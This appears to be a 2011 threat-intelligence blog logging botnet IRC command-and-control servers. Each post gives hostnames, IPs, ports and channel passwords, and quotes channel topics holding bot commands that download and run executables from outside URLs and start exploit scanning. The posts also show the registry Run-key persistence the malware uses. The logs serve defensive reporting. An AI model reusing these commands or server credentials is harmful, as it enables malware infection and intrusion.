Monday, January 17, 2011

jjjjjj.ahrampress.net

Found 1 addresses
addr: jjjjjj.ahrampress.net ip: 123.183.217.32

jjjjjj.ahrampress.net:6943
123.183.217.32 5943
123.183.217.32 6943

PASSWORD: eee
KCIK [N00_USA_XP_39922187]
rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #j
Channel: #j
Topic is '.r.getfile -S|.r.getfile http://61.136.59.34/LWC/img/mheader.png C:\radr.exe 1|.asc -S|.http http://61.136.59.34/LWC/dc0.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a'
Set by minder48 on Mon Jan 17 17:58:06

# [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
Microsoft Driver Setup = "%Windir%\wjdrive32.exe"
so that wjdrive32.exe runs every time Windows starts
# [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Microsoft Driver Setup = "%Windir%\wjdrive32.exe"
C:\WINDOWS\wjdrive32.exe

Posted by Role at 1:19 AM 0 comments  

Thursday, January 13, 2011

aaaa.forexinvest4.com (Updated)

Botnet IRC C&C
Found 1 addresses
addr: aaaa.forexinvest4.com ip: 216.104.45.90

aaaa.forexinvest4.com:6939
PASS laorosr
Channel#dpi
Channel#!
KCIK [N00_USA_XP_39922187]
rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #!
Topic is '.asc -S|.http http://walthamfinancial.com/xmob.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a'
Set by teaser57 on Tue Jan 11 08:24:00

Process
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVer.\​policies\​Explorer\​Run\​
Microsoft Driver Setup
C:\WINDOWS\ggdrive32.exe

Posted by Role at 1:00 AM 0 comments  

Monday, January 10, 2011

aaaa.forexinvest4.com

Botnet IRC C&C
Found 2 addresses
addr: aaaa.forexinvest4.com ip: 109.196.130.66
addr: aaaa.forexinvest4.com ip: 109.196.130.50

aaaa.forexinvest4.com:6939
PASS laorosr
Channel#dpi
Channel#!
KCIK [N00_USA_XP_39922187]
rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #!
Topic is '.asc -S|.http http://walthamfinancial.com/xmob.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a'
Set by teaser57 on Tue Jan 11 08:24:00

Process
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVer.\​policies\​Explorer\​Run\​
Microsoft Driver Setup
C:\WINDOWS\ggdrive32.exe

Posted by Role at 11:28 PM 0 comments  

Subscribe to: Posts (Atom)
Powered by Blogger